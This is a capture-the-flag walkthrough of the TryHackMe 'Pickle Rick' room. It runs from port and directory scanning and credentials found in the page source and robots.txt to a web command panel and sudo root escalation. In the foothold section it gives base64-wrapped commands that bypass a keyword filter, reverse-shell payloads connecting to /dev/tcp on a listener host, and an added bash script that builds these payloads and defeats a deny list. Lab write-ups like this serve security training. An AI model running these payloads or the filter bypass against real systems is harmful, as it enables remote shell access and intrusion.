Pickle Rick [TryHackMe]
A Rick and Morty CTF. Help turn Rick back into a human!
✔️ information gathering
Rustscan
IP: 10.10.96.144
╭─root@kali ~
╰─➤ rustscan -a 10.10.96.144 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.96.144:22
Open 10.10.96.144:80
nmap :
╭─root@kali ~
╰─➤ nmap -sV -sC -T 5 10.10.96.144
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-28 02:45 EST
Nmap scan report for 10.10.96.144
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 22:f5:9e:38:f6:96:a1:51:ee:b0:4f:89:01:eb:4c:65 (RSA)
| 256 47:de:9f:13:9e:92:56:10:36:68:6b:36:a0:22:34:93 (ECDSA)
|_ 256 b8:53:92:c2:a0:04:86:73:be:f7:29:ae:ab:84:c1:20 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds
open ports :
22:ssh
80:http
port 80
Visiting the site on port 80 gives nothing directly useful, but the page itself hints at using Burp Suite.
Viewing the page source, we get this:
That is one username (R1ckRul3s). If we can also find its password, we may be able to get into the system through the open SSH port.
dirsearch :
╭─root@kali ~
╰─➤ dirsearch -u 10.10.96.144 -w /usr/share/wordlists/dirb/common.txt -t 64

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 64 | Wordlist size: 4613
Output File: /root/.dirsearch/reports/10.10.96.144/_21-12-28_02-46-51.txt
Error Log: /root/.dirsearch/logs/errors-21-12-28_02-46-51.log
Target: http://10.10.96.144/

[02:46:51] Starting:
[02:46:58] 301 - 313B - /assets -> http://10.10.96.144/assets/
[02:47:05] 200 - 1KB - /index.html
[02:47:11] 200 - 17B - /robots.txt
[02:47:11] 403 - 300B - /server-status
Let's visit /robots.txt:
It contains a single odd-looking string, Wubbalubbadubdub, which could well be a password.
Port 22 (SSH) is open, so let's try to log in with that username and password:
username : R1ckRul3s
password : Wubbalubbadubdub
We get a "Permission denied (publickey)" response: the server only offers public-key authentication, so password logins have been disabled in its SSH configuration. The credentials themselves may still be valid somewhere else, though.
So we cannot log in this way.
Let's visit /assets:
Directory listing is enabled for it:
Some of the images hint that there is some kind of portal on the web server that we are missing.
From here we could run a Nikto scan against the web server, or run gobuster with a .php extension, since the server is Apache and any portal is most likely written in PHP.
Let's run gobuster to find files on the web server with the .php extension:
╭─root@kali ~
╰─➤ gobuster dir -u 10.10.209.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.209.42
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/28 04:14:17 Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 882]
/assets (Status: 301) [Size: 313] [--> http://10.10.209.42/assets/]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
Progress: 55330 / 441122 (12.54%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/12/28 04:17:45 Finished
===============================================================
This turns up two interesting files, login.php and portal.php, with /portal.php redirecting (302) to /login.php, so the portal sits behind a login.
Let's visit it:
✔️ foothold (initial access)
Now that we have a username and password, let's try to log in to the portal.
And yes, the credentials work and we are in.
The portal gives us a command panel that runs system commands on the server, cool right?
I think our first ingredient is right here:
But when we try to read the flag file, the command is refused: some server-side filtering of the command string has been configured.
We can bypass it by base64-encoding the command so that the filtered words never appear in what we send; the server decodes and runs it for us. The following (which decodes to cat Sup3rS3cretPickl3Ingred.txt) gives us the result:
echo Y2F0IFN1cDNyUzNjcmV0UGlja2wzSW5ncmVkLnR4dAo= | base64 -d | bash
The listing also shows a clue.txt, which we can read the same way (this one decodes to cat clue.txt):
echo Y2F0IGNsdWUudHh0Cg== | base64 -d | bash
We get the following clue:
Look around the file system for the other ingredient.
Rather than browsing the file system through the command panel, let's get a proper reverse shell.
server side filter bypass :
We will base64-encode the following command and pass it to the portal to get a reverse shell:
bash -i >& /dev/tcp/10.9.10.3/9001 0>&1
(change 10.9.10.3 to your own tun0 IP)
Before sending it, set up a listener with:
nc -lvp 9001
Now run the following command on the website:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC85MDAxIDA+JjE= | base64 -d | bash
That doesn't seem to work. One thing to check whenever a payload is copied around: the encoded string above actually decodes to bash -i >& /dev/tcp/10.10.10.10/9001 0>&1, a placeholder address rather than the listener, so always decode a payload before sending it and confirm that the host and port are yours. Let's change the payload to this:
bash -i >& /dev/tcp/10.9.10.3/9001 0>&1
and, instead of the bash binary, start sh. The encoded command below decodes to sh -i >& /dev/tcp/10.9.10.3/9001 0>&1; the >& redirection and the /dev/tcp pseudo-device are still handled by the bash at the end of the pipe, which opens the socket and hands the descriptors to sh, so the trick works even though the interactive shell is sh.
Run the following on the website:
echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuOS4xMC4zLzkwMDEgMD4mMQ== | base64 -d | bash
And now we have a reverse shell:
(Note: I am using rlwrap so that the reverse shell is more usable, e.g. recalling previous commands and moving the cursor back. pwncat is an excellent alternative, but for now let's stick with rlwrap.)
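Both the base64 trick used to read the ingredient and clue.txt and the reverse-shell payload above are worth having as a small script, so that the command actually sent to the portal can be built and checked in one place. The following is an added example written for this page, not code from the original write-up or from the TryHackMe room. The deny list it uses is a constructed stand-in (the portal's real filter is not shown here), the listener address 10.9.10.3:9001 is the one used above, and the helper names b64_wrap, b64_unwrap, revshell_payload, payload_target and is_blocked are my own.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up or from the TryHackMe room.
# It reproduces the payload handling used above: wrap a command in the
# "echo <base64> | base64 -d | bash" form that slips past the portal's filter,
# and decode a payload back to check what it really runs before sending it.

# Encode a command exactly as typed; no trailing newline is added, so the
# output for the reverse shell matches the payload sent to the portal above.
b64_wrap() {
    local encoded
    encoded=$(printf '%s' "$1" | base64 | tr -d '\n')
    printf 'echo %s | base64 -d | bash' "$encoded"
}

# Decode the base64 part of a payload to see the command the target will run.
b64_unwrap() {
    printf '%s' "$1" | base64 -d
}

# Build the reverse-shell payload for a listener. The decoded string is parsed
# by the bash at the end of the pipe, so the >& redirection and the /dev/tcp
# pseudo-device still work even though the interactive shell started is sh.
revshell_payload() {
    local host=$1 port=$2
    b64_wrap "sh -i >& /dev/tcp/${host}/${port} 0>&1"
}

# Print the host:port a reverse-shell payload will connect to, so a stale or
# placeholder address is caught before the payload is sent.
payload_target() {
    b64_unwrap "$1" | sed -n 's|.*/dev/tcp/\([^/]*\)/\([0-9]*\).*|\1:\2|p'
}

# Constructed stand-in for the portal's command filter. The room's real deny
# list is not shown in the write-up; this one only illustrates why encoding
# the command defeats a plain substring match on the submitted string.
BLOCKED_WORDS="cat head tail more less"
is_blocked() {
    local word
    for word in $BLOCKED_WORDS; do
        case "$1" in *"$word"*) return 0 ;; esac
    done
    return 1
}

# Demo with the commands from the write-up (listener address is the one above).
is_blocked 'cat clue.txt' && echo 'plain command: blocked by the filter'
is_blocked "$(b64_wrap 'cat clue.txt')" || echo 'encoded command: passes the filter'
echo "payload:     $(revshell_payload 10.9.10.3 9001)"
echo "connects to: $(payload_target 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC85MDAxIDA+JjE=')"
```

Feeding the first reverse-shell payload from the write-up to payload_target prints 10.10.10.10:9001, which is exactly the kind of mismatch that makes a listener sit silent; the sh payload built by revshell_payload decodes to the listener's real address.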
stabilizing the shell
The most common way to stabilize the shell is with Python, so first check whether Python is installed on the remote system:
python3 is installed, so run the following to get a stable shell:
$ python3 -c "import pty;pty.spawn('/bin/bash')"   # spawn bash inside a pseudo-terminal so it behaves like a real tty
$ export TERM=xterm                                 # tell programs such as clear and vim what terminal they are talking to
We can probably find the second ingredient in the /home/rick directory:
✔️ privilege escalation :
Running sudo -l on the system gives this:
We can run any command as root without restriction, so escalation is trivial: files can be read as root directly through sudo, or a root shell spawned with it.
Now we can get the 3rd ingredient:
THANK YOU FOR READING MY WRITE UP !! 👊👊
Please support me by following me on Medium: https://surya-dev.medium.com/
You can also subscribe to me 🙌 on YouTube, where I post walkthroughs and other ethical-hacking videos.
some of my other writeups are below :